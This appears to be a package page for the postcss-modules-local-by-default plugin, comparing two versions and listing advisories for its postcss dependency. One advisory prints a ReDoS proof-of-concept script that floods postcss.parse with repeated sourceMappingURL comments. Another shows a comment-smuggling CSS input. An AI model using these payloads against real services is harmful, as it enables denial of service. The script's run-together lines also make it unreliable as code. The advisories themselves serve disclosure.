postcss-modules-local-by-default is a valuable PostCSS plugin for developers embracing CSS Modules in their projects, enabling a cleaner and more intuitive workflow by making local scoping the default behavior for CSS classes. Comparing versions 0.0.9 and 0.0.10, a subtle yet significant change emerges in the dependency on css-selector-tokenizer. Version 0.0.9 relied on version 0.4.0, while version 0.0.10 upgraded this dependency to version 0.5.1. While seemingly minor, this update likely incorporates bug fixes, performance improvements, and possibly new features within the css-selector-tokenizer library, impacting how CSS selectors are parsed and handled by the plugin.
For developers using postcss-modules-local-by-default, the core functionality remains consistent: simplifying CSS Modules development. The core of the library lies in automatically scoping CSS classes locally unless explicitly specified as global. This enhancement prevents unintended style conflicts and promotes modularity, making CSS more maintainable and predictable, especially in large-scale applications. The plugin integrates seamlessly into PostCSS workflows and offers a straightforward way to adopt best practices for CSS scoping. The MIT license ensures flexibility for usage in various projects, while the included development dependencies like eslint, istanbul, and coveralls point to a well-maintained and tested library.
All the vulnerabilities related to the version 0.0.10 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.